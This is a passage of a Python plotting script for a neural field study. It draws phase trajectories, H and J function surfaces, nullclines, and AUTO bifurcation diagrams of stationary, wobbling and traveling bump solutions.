xytext=(dat.th1[i-back_idx], dat.th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
colors = np.linspace(.85,0.,len(dat.th1[start_idx:-1]))
#my_cmap.set_under('w')
size = (1-colors)*30
#ax.set_title('g='+str(g)+'; q='+str(q)+'; eps='+str(eps))
ax1.scatter(dat.th1[start_idx:-1],dat.th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax1.scatter(dat.th1[-1],dat.th2[-1],marker="*",color='black',s=200,facecolors='white')
ax1.scatter(dat.th1[start_idx],dat.th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax1.set_xlim(-pi,pi)
ax1.set_ylim(-pi,pi)
ax1.set_xlabel(r'$\theta_1$',fontsize=20)
ax1.set_ylabel(r'$\theta_2$',fontsize=20)
ax1.set_xticks(np.arange(-1,1+.5,.5)*pi)
ax1.set_yticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax1.set_xticklabels(x_label,fontsize=20)
ax1.set_yticklabels(x_label,fontsize=20)
## Plot phase full
ax2 = fig.add_subplot(132)
ax2.set_title(r"\textbf{(b)}",x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
# remove first half of sim to ignore transients
start_idx = int(ph_full.dde_TN*ph_full_factor)
total_idx = ph_full.dde_TN - start_idx
arrow_idx_increment = total_idx/ph_full_increment
back_idx = 1
th1 = np.mod(ph_full.th1+pi,2*pi)-pi
th2 = np.mod(ph_full.th2+pi,2*pi)-pi
for i in range(start_idx,ph_full.dde_TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax2.annotate("",
xy=(th1[i], th2[i]), xycoords='data',
xytext=(th1[i-back_idx], th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
# http://stackoverflow.com/questions/17682216/scatter-plot-and-color-mapping-in-python
colors = np.linspace(.75,0.,len(ph_full.th1[start_idx:-1]))
size = (1-colors)*30
ax2.scatter(th1[start_idx:-1],th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax2.scatter(th1[-1],th2[-1],marker="*",color='black',s=200,facecolors='white')
ax2.scatter(th1[start_idx],th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax2.set_xlim(-pi,pi)
ax2.set_ylim(-pi,pi)
ax2.set_xlabel(r'$\theta_1$',fontsize=20)
#ax2.set_ylabel(r'$\theta_2$')
ax2.set_xticks(np.arange(-1,1+.5,.5)*pi)
#ax.set_yticks([])
ax2.set_xticklabels(x_label,fontsize=20)
ax2.set_yticklabels([])
## Plot phase approx
ax3 = fig.add_subplot(133)
ax3.set_title(r"\textbf{(c)}",x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
# remove first half of sim to ignore transients
start_idx = int(ph_approx.dde_TN*ph_approx_factor)
total_idx = ph_approx.dde_TN - start_idx
arrow_idx_increment = total_idx/ph_approx_increment
back_idx = 1
th1 = np.mod(ph_approx.th1+pi,2*pi)-pi
th2 = np.mod(ph_approx.th2+pi,2*pi)-pi
for i in range(start_idx,ph_approx.dde_TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax3.annotate("",
xy=(th1[i], th2[i]), xycoords='data',
xytext=(th1[i-back_idx], th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
# http://stackoverflow.com/questions/17682216/scatter-plot-and-color-mapping-in-python
colors = np.linspace(.75,0.,len(ph_approx.th1[start_idx:-1]))
size = (1-colors)*30
ax3.scatter(th1[start_idx:-1],th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax3.scatter(th1[-1],th2[-1],marker="*",color='black',s=200,facecolors='white')
ax3.scatter(th1[start_idx],th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax3.set_xlim(-pi,pi)
ax3.set_ylim(-pi,pi)
ax3.set_xlabel(r'$\theta_1$',fontsize=20)
#ax2.set_ylabel(r'$\theta_2$')
ax3.set_xticks(np.arange(-1,1+.5,.5)*pi)
#ax.set_yticks(np.arange(-1,1+.5,.5)*pi)
ax3.set_xticklabels(x_label,fontsize=20)
ax3.set_yticklabels([])
return fig
def HJ_i_fig():
"""
plot H_i in first row
J_i in second row
"""
dat = twodp.Phase(recompute_h=False,recompute_j=False)
H1,H2 = dat.H1,dat.H2
J1,J2 = dat.J1,dat.J2
fig = plt.figure(figsize=(10,10))
subtitle_shift = -.0
ax11 = fig.add_subplot(2,2,1,projection='3d')
ax11.set_title(r'\textbf{(a)}',x=subtitle_shift)
#ax11.set_title(r"$H_1$")
ax11 = twod.plot_s(ax11,H1)
ax11.set_zlabel(r'$H_1$')
ax12 = fig.add_subplot(2,2,2,projection='3d')
ax12.set_title(r'\textbf{(b)}',x=subtitle_shift)
#ax12.set_title(r"$H_2$")
ax12 = twod.plot_s(ax12,H2)
ax12.set_zlabel(r'$H_2$')
ax21 = fig.add_subplot(2,2,3,projection='3d')
ax21.set_title(r'\textbf{(c)}',x=subtitle_shift)
#ax21.set_title(r"$J_1$")
ax21 = twod.plot_s(ax21,J1)
ax21.set_zlabel(r'$J_1$')
ax22 = fig.add_subplot(2,2,4,projection='3d')
ax22.set_title(r'\textbf{(d)}',x=subtitle_shift)
#ax22.set_title(r"$J_2$")
ax22 = twod.plot_s(ax22,J2)
ax22.set_zlabel(r'$J_2$')
plt.tight_layout()
return fig
def HJ_fig():
"""
plot H in first row
J in second row
"""
dat = oned_simple.SteadyState()
#dat.plot('J')
#dat.plot('H')
#plt.show()
fig = plt.figure(figsize=(10,3))
subtitle_shift = -0.05
subtitle_shift_y = 1.1
ax11 = fig.add_subplot(1,2,1)
ax11.set_title(r'\textbf{(a)}',x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
newdom = np.linspace(-pi,pi,dat.N)
ax11.plot(newdom,np.roll(dat.H_numerical,dat.N/2),color='black',lw=4,label='H')
ax11.plot(newdom,np.roll(dat.H(dat.domain),dat.N/2),color='#3399ff',ls='--',lw=3,label='H approx.')
ax11.tick_params(labelsize=15)
#plot.tick_params(axis='both', which='major', labelsize=10)
ax11.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax11.set_xticklabels(x_label,fontsize=15)
ax11.set_xlim(-pi,pi)
ax11.legend(loc=4)
ax12 = fig.add_subplot(1,2,2)
ax12.set_title(r'\textbf{(b)}',x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
ax12.plot(newdom,np.roll(dat.J_numerical,dat.N/2),color='black',lw=4,label='J')
ax12.plot(newdom,np.roll(dat.J(dat.domain),dat.N/2),color='#3399ff',ls='--',lw=3,label='J approx.')
ax12.tick_params(labelsize=15)
ax12.set_xticks(np.arange(-1,1+.5,.5)*pi)
ax12.set_xticklabels(x_label,fontsize=15)
ax12.set_xlim(-pi,pi)
ax12.legend(loc=3)
plt.tight_layout()
return fig
def H_approx_fig():
fig = plt.figure(figsize=(10,10))
subtitle_shift = -.0
dat = twodp.Phase()
h1_approx_p = dat.h1_approx_p(dat.XX,dat.YY)
h2_approx_p = dat.h2_approx_p(dat.XX,dat.YY)
dat2 = twodp.Phase(recompute_h=False,recompute_j=False)
H1 = dat2.H1
J1 = dat2.J1
ax11 = fig.add_subplot(2,2,1,projection='3d')
ax11 = twod.plot_s(ax11,h1_approx_p)
ax11.set_title(r'\textbf{(a)}',x=subtitle_shift)
ax11.set_zlabel(r'$\hat H_1$')
ax12 = fig.add_subplot(2,2,2,projection='3d')
ax12 = twod.plot_s(ax12,-h1_approx_p)
ax12.set_title(r'\textbf{(b)}',x=subtitle_shift)
ax12.set_zlabel(r'$\hat J_1$')
ax21 = fig.add_subplot(2,2,3,projection='3d')
ax21 = twod.plot_s(ax21,H1)
ax21.set_title(r'\textbf{(c)}',x=subtitle_shift)
ax21.set_zlabel(r'$H_1$')
ax22 = fig.add_subplot(2,2,4,projection='3d')
ax22 = twod.plot_s(ax22,J1)
ax22.set_title(r'\textbf{(d)}',x=subtitle_shift)
ax22.set_zlabel(r'$J_1$')
return fig
def H_approx_nullclines():
"""
plot level curves z=0. intersections denote existence of limit cycles.
"""
ncx = np.loadtxt("nc_phase_approx_q=0.5_g=1.5_x_mesh=100.dat")
ncy = np.loadtxt("nc_phase_approx_q=0.5_g=1.5_y_mesh=100.dat")
#ncx = np.loadtxt("nc_phase_approx_q=1_g=3_x_mesh100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=1_g=3_y_mesh100.dat")
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(131)
#ncy[:,0] = np.sort(ncy[:,0])
#ncy[:,1] = ncy[:,1][np.argsort(ncy[:,0])]
ncy[ncy[:,1]>.85]=np.nan
#ncx,ncy = remove_redundant(ncx,ncy,tol=.01)
index_to_order_x_by = ncx[:,1].argsort()
index_to_order_y_by = ncy[:,0].argsort()
ncx_ordered = ncx[index_to_order_x_by]
ncy_ordered = ncy[index_to_order_y_by]
#ncx = np.loadtxt("nc_phase_approx_q=1_g=3_x_mesh100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=1_g=3_y_mesh100.dat")
#ncy[:,0] = np.sort(ncy[:,0])
#ncy[:,1] = ncy[:,1][np.argsort(ncy[:,0])]
#ax2.scatter(ncx[:,0],ncx[:,1],edgecolor='none',facecolor='green',s=15)
#ax2.scatter(ncy[:,0],ncy[:,1],edgecolor='none',facecolor='blue',s=15)
#ax2.plot(ncy[:,0],ncy[:,1],color='blue')
ax.plot(ncx_ordered[:,0],ncx_ordered[:,1],color='green',lw=3)
ax.plot(ncy_ordered[:,0],ncy_ordered[:,1],color='blue',lw=3)
#ax.scatter(ncx[:,0],ncx[:,1],edgecolor='none',facecolor='green',s=15)
#ax.scatter(ncy[:,0],ncy[:,1],edgecolor='none',facecolor='blue',s=15)
ax.set_xlabel(r'$r$')
ax.set_ylabel(r'$\nu$')
ax.set_title(r'$g=1.501$')
# nullcline intersections (from XPP)
r1 = .021405
nu1 = .707
r2 = 1.7474
nu2 = .18074
ax.scatter(r1,nu1,edgecolor='black',facecolor='white',s=60)
ax.scatter(r2,nu2,edgecolor='black',facecolor='white',s=60)
ax.annotate(r'$r='+str(r1)+r'$ \\ $\nu='+str(nu1)+r'$', xy=(r1+.1, nu1), xycoords='data',
xytext=(40, 0), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=0,armB=15,rad=10"),
)
ax.annotate(r'$r='+str(r2)+r'$ \\ $\nu='+str(nu2)+r'$', xy=(r2-.02, nu2-.02), xycoords='data',
xytext=(-60, -40), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-130,armB=15,rad=7"),
)
ax.set_xlim(0,2)
ax.set_ylim(0,1)
##### #PART 2
#ncx = np.loadtxt("nc_phase_approx_q=0.5_g=1.75_x_mesh=100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=0.5_g=1.75_y_mesh=100.dat")
ncx = np.loadtxt("nc_phase_approx_q=0.5_g=2_x_mesh=100.dat")
ncy = np.loadtxt("nc_phase_approx_q=0.5_g=2_y_mesh=100.dat")
ncy[ncy[:,1]>.85]=np.nan
#ncx,ncy = remove_redundant(ncx,ncy,tol=.01)
index_to_order_x_by = ncx[:,1].argsort()
index_to_order_y_by = ncy[:,0].argsort()
ncx_ordered = ncx[index_to_order_x_by]
ncy_ordered = ncy[index_to_order_y_by]
#ncx = np.loadtxt("nc_phase_approx_q=1_g=3_x_mesh100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=1_g=3_y_mesh100.dat")
ax2 = fig.add_subplot(132)
#ncy[:,0] = np.sort(ncy[:,0])
#ncy[:,1] = ncy[:,1][np.argsort(ncy[:,0])]
#ax2.scatter(ncx[:,0],ncx[:,1],edgecolor='none',facecolor='green',s=15)
#ax2.scatter(ncy[:,0],ncy[:,1],edgecolor='none',facecolor='blue',s=15)
#ax2.plot(ncy[:,0],ncy[:,1],color='blue')
ax2.plot(ncx_ordered[:,0],ncx_ordered[:,1],color='green',lw=3)
ax2.plot(ncy_ordered[:,0],ncy_ordered[:,1],color='blue',lw=3)
ax2.set_xlabel(r'$r$')
#ax2.set_ylabel(r'$\nu$')
ax2.set_title(r'$g=2$')
ax2.set_yticklabels([])
# nullcline intersections (from XPP)
r1 = 0.59458
nu1 = 0.69031
r2 = 1.4227
nu2 = 0.33135
#r1 = .41087
#nu1 = .70345
#r2 = 1.5752
#nu2 = .25322
ax2.scatter(r1,nu1,edgecolor='black',facecolor='white',s=60)
ax2.scatter(r2,nu2,edgecolor='black',facecolor='white',s=60)
ax2.annotate(r'$r='+str(r1)+r'$ \\ $\nu='+str(nu1)+r'$', xy=(r1, nu1-.025), xycoords='data',
xytext=(-40, -80), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-90,armB=15,rad=10"),
)
ax2.annotate(r'$r='+str(1.4928)+r'$ \\ $\nu='+str(0.4808)+'$', xy=(r2-.02, nu2-.02), xycoords='data',
xytext=(-60, -40), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-130,armB=15,rad=7"),
)
ax2.set_xlim(0,2)
ax2.set_ylim(0,.8)
###### ## PART 3
ncx = np.loadtxt("nc_phase_approx_q=0.5_g=2.44_x_mesh=100.dat")
ncy = np.loadtxt("nc_phase_approx_q=0.5_g=2.44_y_mesh=100.dat")
#ncx = np.loadtxt("nc_phase_approx_q=1_g=3_x_mesh100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=1_g=3_y_mesh100.dat")
ax3 = fig.add_subplot(133)
#ncy[:,0] = np.sort(ncy[:,0])
#ncy[:,1] = ncy[:,1][np.argsort(ncy[:,0])]
ax3.scatter(ncx[:,0],ncx[:,1],edgecolor='none',facecolor='green',s=15)
ax3.scatter(ncy[:,0],ncy[:,1],edgecolor='none',facecolor='blue',s=15)
ax3.set_xlabel(r'$r$')
#ax3.set_ylabel(r'$\nu$')
ax3.set_title(r'$g=2.44$')
ax3.set_yticklabels([])
# nullcline intersections (from XPP)
r1 = .41087
nu1 = .70345
r2 = 1.5752
nu2 = .25322
#ax3.scatter(r1,nu1,edgecolor='black',facecolor='white',s=60)
#ax3.scatter(r2,nu2,edgecolor='black',facecolor='white',s=60)
"""
ax2.annotate(r'$r='+str(r1)+r'$ \\ $\nu='+str(nu1)+r'$', xy=(r1, nu1-.05), xycoords='data',
xytext=(-30, -50), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-90,armB=15,rad=10"),
)
ax2.annotate(r'$r='+str(1.4928)+r'$ \\ $\nu='+str(0.4808)+'$', xy=(r2-.02, nu2-.02), xycoords='data',
xytext=(-60, -40), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-90,armB=15,rad=7"),
)
"""
ax3.set_xlim(0,2)
ax3.set_ylim(0,1)
return fig
def oned_phase_auto(choice='q1'):
"""
1d bifurcation diagram of reduced system from auto
see 1d.ode
"""
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(121)
if choice == 'q1':
filelist = ["bif_q1_gvary1.dat","bif_q1_gvary2a.dat","bif_q1_gvary2b.dat","bif_q1_gvary2c.dat"]
elif choice == 'q0.5':
filelist = ["bif_q0.5_gvary1.dat","bif_q0.5_gvary2a.dat","bif_q0.5_gvary2b.dat","bif_q0.5_gvary_travel.dat"]#,"bif_q0.5_gvary2c.dat"]
branchidx = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
stabe = False
ustabe = False
stabp = False
ustabp = False
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
label = None
if t == 1:
lw=3;color='red'
marker = None
if branchidx == 0 and not(stabe):
label='Stable Equilibrium'
ls = '-'
stab = True
else:
label=None
elif t == 2:
lw=1;color='black'
marker = None
if branchidx == 0 and not(ustabe):
label='Unstable Equilibrium'
ls = '-'
ustabe = True
else:
label=None
elif t == 3:
lw=3;color='green'
#marker = 'o'
marker = None
if branchidx == 0 and not(stabp):
label='Stable Periodic'
ls='-'
stabp = True
else:
label=None
elif t == 4:
lw=1;color='blue'
#marker = 'o'
marker = None
if branchidx == 0 and not(ustabp):
label='Unstable Periodic'
ls='-'
ustabp = True
else:
label=None
#print b,t
alpha = 1
me = 5
if filename == "bif_q0.5_gvary_travel.dat":
ls = '--'
else:
ls = '-'
if filename == "bif_q1_gvary1.dat" or \
filename == "bif_q0.5_gvary1.dat" or \
filename == "bif_q0.5_gvary2a.dat" or \
filename == "bif_q0.5_gvary2b.dat":
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1]+2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1]+2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
if filename == "bif_q1_gvary1.dat" or \
filename == "bif_q0.5_gvary1.dat":
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1]-2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1]-2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
"""
if filename == "bif_q1_gvary2a.dat" or \
filename == "bif_q0.5_gvary2a.dat" or \
filename == "bif_q0.5_gvary2c.dat":
label = None
alpha = 0.5
else:
alpha = 1.
"""
if filename == "bif_q0.5_gvary_travel.dat":
label = None
ax.plot(clean(dat[:,0],dat[:,1])[0],-(clean(dat[:,0],dat[:,1])[1]-2*pi-pi)+pi,
lw=lw,color=color,alpha=alpha,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1]-2*pi,
lw=lw,color=color,alpha=alpha,label=label,marker=marker,markevery=me,ls=ls)
else:
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=lw,color=color,alpha=alpha,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
lw=lw,color=color,alpha=alpha,label=label,marker=marker,markevery=me,ls=ls)
print branchidx, label
branchidx += 1
if choice == 'q0.5':
ax.annotate("BP",color='teal',
xy=(2.36581,1.7138), xycoords='data',
xytext=(2, 2.5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='teal'),
)
ax.annotate("HB",color='orange',
xy=(1.5,0), xycoords='data',
xytext=(1.2, 1.2), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='orange'),
)
ax.annotate("LP 2",color='purple',
xy=(2.65599, 11.8292-2*pi), xycoords='data',
xytext=(2.3, 2*pi-.3), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
#ax.annotate(r"\colorbox{blue!20}{{\color{yellow}LP Large}}",
ax.annotate("LP 1",
xy=(2.20126, 0.847046), xycoords='data',
xytext=(2.7, .40746), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w"),
)
# unstable equilib
ax.plot([0,5],[pi,pi],color='black')
ax.plot([0,5],[-pi,-pi],color='black')
# mark bistability
ax.plot([2.20126,2.20126],[-10,10],color='black',ls=':')
ax.plot([2.34017,2.34017],[-10,10],color='black',ls=':')
# labels
ax.set_xlabel(r'$\bm{g}$',size=15)
ax.set_ylabel(r'$\bm{\theta}$',size=15)
# set y axis ticks to multiples of pi
ax.set_ylim(-pi-.1,2*pi+.1)
ax.set_xlim(0,5)
ax.set_yticks(np.arange(-1,2+1.,1.)*pi)
#y_label = [r"$-3\pi$", r"$-2\pi$",
# r"$-\pi$", r"$0$",
# r"$\pi$",r"$2\pi$",r"$3\pi$"]
y_label = [r"$-\pi$", r"$0$",
r"$\pi$", r"$2\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax.set_yticklabels(y_label)
ax.legend(loc='lower left',fontsize=10)
"""
2 param bifurcation diagram from auto
"""
#fig = plt.figure(figsize=(7.5,7.5))
#fig = plt.figure()
ax2 = fig.add_subplot(122)
namelist = ['BP','HB','LP 2','LP 1']
colorlist = ['teal','orange','purple','black']
filelist = ["bif_gq_bp.dat","bif_gq_hb.dat","bif_gq_lp_travel.dat","bif_gq_lp_large.dat"]
ls = ['-', '--', '-.', ':']
i = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
bidx = 0
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
if bidx == 0:
label = namelist[i]
else:
label = None
ax2.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=2,color=colorlist[i],label=label,ls=ls[i])
#ax2.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
# lw=2,color=colorlist[i],label=label)
bidx += 1
i += 1
ax2.text(1.5,2.6,'1. Stationary Bump',rotation=0,size=15)
ax2.text(3.3,2.5,'2. Wobbling Bump',rotation=37,size=15)
ax2.text(3.5,1.55,'3. Bistability',rotation=27,size=15)
ax2.text(3.2,.3,'4. Traveling Bump',rotation=0,size=15)
ax2.plot([0,5],[.5,.5],color='gray')
#ax2.text(1.5,.075,'reminder: added line from g=2 to g=1 for LP2')
ax2.legend(loc='upper left',fontsize=10)
ax2.set_xlabel(r'$\bm{g}$',size=15)
ax2.set_ylabel(r'$\bm{q}$',size=15)
ax2.set_xlim(1,5)
return fig
def draw_branches(ax,filelist,smallscale=False):
branchidx = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
#print branchlist
# first branch
stabe = False
ustabe = False
stabp = False
ustabp = False
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
#print typelist
for t in typelist:
print 'branch',b,'type',t
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
label = None
if t == 1:
lw=3;color='red'
marker = None
if branchidx == 0 and not(stabe):
label='Stable Equilibrium'
ls = '-'
stab = True
else:
label=None
elif t == 2:
lw=1;color='black'
marker = None
if branchidx == 0 and not(ustabe):
label='Unstable Equilibrium'
ls = '-'
ustabe = True
else:
label=None
elif t == 3:
lw=3;color='green'
#marker = 'o'
marker = None
if branchidx == 0 and not(stabp):
label='Stable Periodic'
ls='-'
stabp = True
else:
label=None
elif t == 4:
lw=1;color='blue'
#marker = 'o'
marker = None
if branchidx == 0 and not(ustabp):
label='Unstable Periodic'
ls='-'
ustabp = True
else:
label=None
#print b,t
alpha = 1
me = 5
if (filename == 'bif_full_q0.5_gvary2c.dat') or\
(filename == "bif_full_q0.5_gvary_travel.dat") or\
(filename == "bif_full_a2_q0.5_gvary2.dat") or\
(filename == "bif_full_a3_q0.5_gvary2.dat"):
ls='--'
else:
ls='-'
if filename == "bif_full_q1_gvary1.dat" or \
filename == "bif_full_q0.5_gvary1.dat" or \
filename == "bif_full_q0.5_gvary2a.dat" or \
filename == "bif_full_q0.5_gvary2b.dat":
ax.plot(clean(dat[:,0],dat[:,1],smallscale=smallscale)[0],clean(dat[:,0],dat[:,1],smallscale=smallscale)[1]+2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2],smallscale=smallscale)[0],clean(dat[:,0],dat[:,2],smallscale=smallscale)[1]+2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
elif filename == "bif_full_q1_gvary1.dat" or \
filename == "bif_full_q0.5_gvary1.dat" or \
filename == "bif_full_q0.5_gvary2c.dat":
#print 'gvary_2c',filename
ax.plot(clean(dat[:,0],dat[:,1],smallscale=smallscale)[0],clean(dat[:,0],dat[:,1],smallscale=smallscale)[1]-2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2],smallscale=smallscale)[0],clean(dat[:,0],dat[:,2],smallscale=smallscale)[1]-2*pi,lw=lw,color=color,marker=marker,markevery=me,ls=ls)
"""
if filename == "bif_q1_gvary2a.dat" or \
filename == "bif_q0.5_gvary2a.dat" or \
filename == "bif_q0.5_gvary2c.dat":
label = None
alpha = 0.5
else:
alpha = 1.
"""
if filename == "bif_full_q0.5_gvary_travel.dat" or\
filename == "bif_full_q0.5_gvary2c.dat":
label = None
ax.plot(clean(dat[:,0],dat[:,1],smallscale=smallscale)[0],-(clean(dat[:,0],dat[:,1],smallscale=smallscale)[1]-2*pi-pi)+pi,
lw=lw,color=color,alpha=alpha,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2],smallscale=smallscale)[0],clean(dat[:,0],dat[:,2],smallscale=smallscale)[1]-2*pi,
lw=lw,color=color,alpha=alpha,label=label,marker=marker,markevery=me,ls=ls)
else:
ax.plot(clean(dat[:,0],dat[:,1],smallscale=smallscale)[0],clean(dat[:,0],dat[:,1],smallscale=smallscale)[1],
lw=lw,color=color,alpha=alpha,marker=marker,markevery=me,ls=ls)
ax.plot(clean(dat[:,0],dat[:,2],smallscale=smallscale)[0],clean(dat[:,0],dat[:,2],smallscale=smallscale)[1],
lw=lw,color=color,alpha=alpha,label=label,marker=marker,markevery=me,ls=ls)
branchidx += 1
return ax
def draw_branches_twop(ax,filelist,namelist,colorlist,ls):
i = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
bidx = 0
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
if bidx == 0:
label = namelist[i]
else:
label = None
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=2,color=colorlist[i],label=label,ls=ls[i])
#ax2.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
# lw=2,color=colorlist[i],label=label)
bidx += 1
i += 1
return ax
def oned_phase_2par(subplots=1,with_numerics=True):
"""
1d domain, 2par bifurcation diagram of reduced system from auto
see 1d.ode
"""
fig = plt.figure(figsize=(7,7))
gs = gridspec.GridSpec(3,3)
ax1 = plt.subplot(gs[:2,:2])
"""
2 param bifurcation diagram from auto
"""
namelist = ['BP','HB','LP 2','LP 1']
colorlist = ['teal','orange','purple','black']
filelist = ["bif_gq_bp.dat","bif_gq_hb.dat","bif_gq_lp_travel.dat","bif_gq_lp_large.dat"]
ls = ['-', '--', '-.', ':']
i = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
bidx = 0
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
if bidx == 0:
label = namelist[i]
else:
label = None
ax1.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=2,color=colorlist[i],label=label,ls=ls[i])
ax1.fill_between()
#ax2.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
# lw=2,color=colorlist[i],label=label)
bidx += 1
i += 1
ax1.text(1.5,2.6,'1. Stationary Bump',rotation=0,size=15)
ax1.text(3.3,2.5,'2. Wobbling Bump',rotation=37,size=15)
ax1.text(3.5,1.6,'3. Bistability',rotation=27,size=15)
ax1.text(3.1,.3,'4. Traveling Bump',rotation=0,size=15)
# plot solutions
#
#########################################################################################
if subplots >= 1:
ax13 = plt.subplot(gs[0,-1])
dat = oned_simple.SimDat(g=0.,q=0.,zshift=0,T=1000,phase=True)
ax13.set_xlabel(r'$x$')
ax13.set_ylabel('$t$')
ax13.set_title(r"\textbf{(a)}",x=0.1)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = dat.t[-1]/dat.dt
pad = 10
start_idx = 100
print start_idx
